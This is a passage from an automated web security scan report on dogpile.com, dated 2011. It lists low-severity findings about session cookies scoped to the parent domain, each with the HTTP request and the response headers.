Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a7a7c2c92e274276a8b4c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:25 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:25 GMT
Connection: close
Content-Length: 64207
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.10. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:13:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f1bd779c38af4c89afa5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:20 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:20 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:20 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.11. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/redir/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=367df53625864920a346c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:46 GMT
Connection: close
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile/ws/index/qcat=Web/qcoll=Relevance/rfcid=0/rfcp=0/padv=/_iceUrlFlag=11?_IceUrl=true">he
...[SNIP]...

6.12. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2f68f4b83d774f748c89c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:42 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:42 GMT; path=/
Set-Cookie: wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301677062725; path=/
Set-Cookie: wsRecent=april+fools+day+pranks,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:43 GMT
Connection: close
Content-Length: 159749
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.13. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c7d0fe76335d40769068c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:05 GMT
Connection: close
Content-Length: 45381
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.14. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d323fe3be73453a893dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:24 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:24 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:24 GMT
Connection: close
Content-Length: 45381
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.15. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7bf15bbd815545118e35c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:26 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:26 GMT
Connection: close
Content-Length: 40937
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.16. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d276184e64f54d5b98bfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:33 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:33 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:32 GMT
Connection: close
Content-Length: 42133
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.17. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6f001cc080a04397bd88c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:14 GMT
Connection: close
Content-Length: 48633
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.18. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ddb977a118474d1b9a72c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:09 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:09 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:09 GMT
Connection: close
Content-Length: 41894
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.19. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=3d97c313d94145899eeac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:15 GMT
Connection: close
Content-Length: 41872
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.20. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6bbbb232f4e94914b016c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:54 GMT
Connection: close
Content-Length: 41884
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.21. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f85c1be494fd483ab40dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:08 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:08 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:07 GMT
Connection: close
Content-Length: 42207
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.22. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6ed1b194da28448c8f14c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:06 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 42209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.23. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/categories/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/categories/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=670b820e86e94451af97c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
